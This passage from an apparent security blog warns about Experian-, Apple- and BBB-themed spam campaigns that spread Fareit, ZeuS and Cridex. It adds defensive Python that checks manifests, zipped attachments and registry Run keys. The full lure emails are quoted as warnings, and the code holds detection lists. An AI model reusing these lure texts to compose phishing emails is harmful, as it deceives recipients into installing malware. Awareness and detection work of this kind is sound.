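        verdict = "nothing notable"
    return {"permissions": flagged, "components": components, "score": score, "verdict": verdict}


# Constructed manifest for a "cheat guide" app that bundles an ad SDK; the class names are made up.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.candycheats">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
  <application android:label="Candy Cheats">
    <activity android:name=".MainActivity"/>
    <activity android:name="com.airpush.android.PushAds"/>
    <receiver android:name="com.airpush.android.BootReceiver"/>
  </application>
</manifest>"""

# Constructed manifest for an app with nothing unusual, for comparison.
CLEAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for label, xml in (("cheats", SAMPLE_MANIFEST), ("notes", CLEAN_MANIFEST)):
        print(label, triage_manifest(xml))
```

The manifest inside an APK is binary XML, so decode it first (apktool d app.apk writes a plain-text AndroidManifest.xml) and feed that file's contents to triage_manifest. A guide app that wants your location, phone identifiers, a boot receiver and the right to add home-screen shortcuts is asking for exactly what the notification-bar ad networks use.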



Monday, March 18, 2013

Experian Spam Used to Spread Data-Stealing Trojan

Don’t open any files attached to emails purporting to be from Experian, claiming that a “key change” has been posted to “one of your three national credit reports.”

Spammers are pumping out Experian-themed emails in an attempt to infect as many computers as possible with malware.

Below is a copy of the email to watch out for:
From: Experian
Subject: IMPORTANT – A Key Change Has Been Posted

Experian

Membership ID #932823422

A Key Change Has Been Posted to One of Your Credit Reports

A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian, Equifax, and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:

  • View detailed report by opening the attachment.

  • You will be prompted to open (view) the file or save (download) it to your computer.

  • For best results, save the file first, then open it in a Web browser.

  • Contact our Customer Care Center with any additional questions.


Note: The attached file contains personal data.

Your Experian.com membership gives you the confidence you need to look after your credit. We encourage you to log-in regularly to take full advantage of the benefits your membership has to offer, such as unlimited access to your Credit Report and Score Tracker. Notifications like this are an important part of your membership, and in helping you stay on top of your credit.

*If it has been less than thirty days since you joined Experian.com, your monthly credit statement includes your information for the period of time you have been enrolled.

© 2013 Consumerinfo.com, Inc.

The danger of this email lies within the attached file, Credit_Report_XXXXXXXXX.zip, which contains an .exe file with the same name and a misleading PDF icon. A VirusTotal scan of the .exe reveals that it is actually PWS:Win32/Fareit, a password-stealing trojan, and not a credit report as the email suggests (big surprise there).

Did You Receive This Email?


If this email lands in your inbox, be sure that you:

  • Do not download or open any attached files.

  • Report the email to SpamCop.

  • Delete the email immediately.


Did You Already Open the Attached File?


According to VirusTotal, 29/46 antivirus programs are capable of detecting the threat associated with this spam campaign, so double-check the VT results and make sure your antivirus is one of them. Then, do a full system scan and remove any detected threats.

[via DataProtectionCenter.com]


Thursday, March 14, 2013

Spam: Surprise! That 40% Apple Discount Coupon is Actually ZeuS Banking Malware

If you get an email offering a coupon to get 40% off Apple products – don’t open the file attached!

Spammers have been sending out emails with bogus coupons that can allegedly be used to shave 40% off the cost of a shiny new iMac, Macbook, or whatever other Apple product the recipient chooses to use it on.

Unfortunately, the only thing enclosed in the file attached to the email, Apple coupon.zip is a copy of the ZeuS Trojan, which will cost the victim money - not help save it - since it steals banking information.

Here's the email to watch out for:

Apple Discount Coupon Spam



From: Apple Inc.
Subject: You are the one!

One out of thousand!

Only 1000 people have been chosenas winners and you turned out to be one of them!

We?d like to offer you a 40% discount coupon for any Apple production (it?s attached to this email). You can buy a MacBook, iPod, iPhone or anything else Apple products you want! All you need to do is print it out and present at the checkout.
So, next time you go to BestBuy, Circuit City or Apple Store you are able to save up to 40% of any purchase of Apple production.

The discount coupon is accepted in Circuit City, Apple Store ot BestBuy

All the rules and detailed information about the lottery are also can be found in the attachments to this email.

Congratulations!

Did You Get This Email?


If you get an email like the one above, it is recommended that you:

  • Do not download or open any files attached to it.

  • Report the email to SpamCop.

  • Delete the email immediately.


[via Barracuda]
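Both this coupon spam and the Experian message above deliver an executable inside a zip, so one check covers both. The example below is added here (it is not from Barracuda, DataProtectionCenter.com or the post): it opens a zipped attachment and judges each member by its leading bytes rather than by its name or icon, so a PE file named like a credit report is caught whatever it is called. The member names (the digits in the Experian name, the inner name of the coupon file), the MZ stub bodies and the benign PDF are constructed stand-ins, not the real samples.

```python
import io
import zipfile

EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png", ".html"}


def sniff(head):
    """Classify a file by its leading bytes; a PDF icon or a .pdf name proves nothing."""
    if head[:2] == b"MZ":
        return "pe-executable"
    if head[:4] == b"%PDF":
        return "pdf"
    if head[:4] == b"PK\x03\x04":
        return "zip"
    return "other"


def inspect_attachment(zip_bytes):
    """Return one verdict per member of a zipped e-mail attachment."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                kind = sniff(fh.read(8))
            basename = info.filename.rsplit("/", 1)[-1].lower()
            exts = ["." + p for p in basename.split(".")[1:]]
            reasons = []
            if kind == "pe-executable":
                reasons.append("MZ/PE header")
            if exts and exts[-1] in EXECUTABLE_EXT:
                reasons.append("executable extension")
            if len(exts) >= 2 and exts[-2] in DOCUMENT_EXT and exts[-1] in EXECUTABLE_EXT:
                reasons.append("double extension")
            if kind == "pe-executable" and exts and exts[-1] in DOCUMENT_EXT:
                reasons.append("executable named as a document")
            findings.append({"name": info.filename, "type": kind,
                             "block": bool(reasons), "reasons": reasons})
    return findings


def build_zip(name, body):
    """Construct a single-member zip in memory (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, body)
    return buf.getvalue()


# Constructed stand-ins: member names follow the posts (the digits and the inner coupon
# name are made up); bodies are a bare MZ stub, not real malware.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"
SAMPLE_EXPERIAN = build_zip("Credit_Report_000000000.exe", FAKE_PE)
SAMPLE_APPLE = build_zip("Apple coupon.pdf.exe", FAKE_PE)
SAMPLE_BENIGN = build_zip("report.pdf", b"%PDF-1.4\n%constructed\n")

if __name__ == "__main__":
    for label, sample in (("experian", SAMPLE_EXPERIAN), ("apple", SAMPLE_APPLE), ("benign", SAMPLE_BENIGN)):
        print(label, inspect_attachment(sample))
```

The name-based checks are there for the report (so a reviewer sees why), but the decision rests on the MZ header: Windows hides known extensions by default and honours the icon embedded in the executable, which is exactly what the "misleading PDF icon" exploits, and neither of those tricks survives a look at the first two bytes.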


BBB “Your Accreditation Terminated” Spam Spreads Cridex Worm

Spammers are abusing the Better Business Bureau brand in a new spam campaign focused on infecting computers with the Cridex worm.

The spam messages do their best to entice users to click the embedded hyperlinks by claiming that their BBB accreditation has been terminated due to consumer complaints. However, recipients should be able to tell that the email is a fake since it is riddled with mindless grammar & spelling mistakes. ("Beaureau"? Really?)

Below are two variants that are currently circulating:
Your Accreditation Terminated

The Better Business Bureau has been temporary Terminated Your Accreditation
A number of latest complaints on you / your company motivated us to transitory Abort your accreditation with Better Business Beaureau. The information about the our decision are available for review at a link below. Please pay attention to this question and let us know about your mind as soon as possible.

We kindly ask you to visit the SUSPENSION REPORT to respond on this claim

We are looking forward to your prompt response.

If you think you got this email by mistake – please forward this message to your principal or accountant

Faithfully yours

Dispute Consultant
Better Business Bureau

 
Dear Owner:

Your accreditation with [COMPANY] was Terminated

A number of latest complaints on you/ your company motivated us to transient Abort your accreditation with Better Business Beaureau. The details of the our decision are available at the link below. Please give attention to this problem and notify us about your mind as soon as possible.

We pleasantly ask you to overview the ABORT REPORT to reply on this situation.

If you think you received this email by mistake – please forward this message to your principal or accountant

We are looking forward to your prompt reaction.

Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.

Sincerely,
– Online Communication Specialist
bbb.org – Start With Trust

Users that make the mistake of following one of the links in the emails shown above will be directed to a third-party website hosting the infamous Blackhole exploit kit, which will attempt to take advantage of unpatched browser and plugin vulnerabilities in order to drop Worm:Win32/Cridex.E on the visiting machine.

Upon infection, Cridex will modify the system registry to ensure it executes whenever Windows starts, inject itself into a variety of running processes, connect to a remote server to provide an attacker remote control, and copy itself to any removable drives attached to the affected system.
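Of the behaviours listed, the autostart change is the easiest one to verify on a suspect machine. The Python below is an added example (not from Webroot or the post): it parses a Regedit .reg export of the Run keys and flags values that launch from user-writable directories, which is where a user-level infection has to live. The sample export, the value names and the paths in it are constructed; the list of user-writable markers and the flagging rule are my assumption.

```python
import re

# Keys Windows consults at logon; a value here is what makes a sample run at every start.
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}

# Directories a user-level infection can write to without elevation (assumed list).
USER_WRITABLE = ("\\appdata\\", "\\application data\\", "\\local settings\\",
                 "\\temp\\", "\\users\\public\\", "%appdata%", "%temp%")

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_reg_export(text):
    """Parse the string values of a Regedit .reg export into {key: {name: data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                # .reg exports escape backslashes and quotes with a backslash.
                data = re.sub(r"\\(.)", r"\1", m.group("data"))
                keys[current][m.group("name")] = data
    return keys


def triage_run_keys(reg_text):
    """List autostart entries and flag those that launch from user-writable locations."""
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        if key.lower() not in RUN_KEYS:
            continue
        for name, data in values.items():
            lowered = data.lower()
            suspicious = any(marker in lowered for marker in USER_WRITABLE)
            findings.append({"key": key, "name": name, "command": data, "suspicious": suspicious})
    return findings


# Constructed export: one ordinary vendor entry and one entry of the shape a user-level
# infection leaves behind. Value names, vendor and paths are made up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="\"C:\\Program Files\\Example Vendor\\updater.exe\" /background"
"KB00170833"="C:\\Users\\alice\\AppData\\Roaming\\KB00170833.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''

if __name__ == "__main__":
    for f in triage_run_keys(SAMPLE_REG):
        print("SUSPICIOUS" if f["suspicious"] else "ok        ", f["name"], f["command"])
```

On the machine in question, export the keys with reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg (and the HKLM equivalent) and open the file with encoding="utf-16", which is what reg.exe writes. A Run value pointing into AppData or Temp is not proof of infection, but it is the entry to check first, and the same parser works on exports taken from a mounted drive when the host itself cannot be trusted.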

Keep Your PC Safe!


Given that this threat requires user interaction, avoiding it should be relatively simple.

  • Manually type in the URL of the website you wish to visit instead of clicking links in emails, especially if they are unsolicited.

  • Do not download or open any files attached to unsolicited emails (or at least be sure to scan them first).

  • Always keep your operating system and installed third-party software patched and up-to-date.

  • Always run antivirus software that offers real-time scanning and keep the virus definitions current.


Too Late?


Did you already click the link in an email similar to the ones above?

Hopefully you’re running one of the 19 antivirus programs capable of detecting the Cridex worm, because you’re going to need to perform a system scan to detect and remove the infection. Hop to it!

[via Webroot]
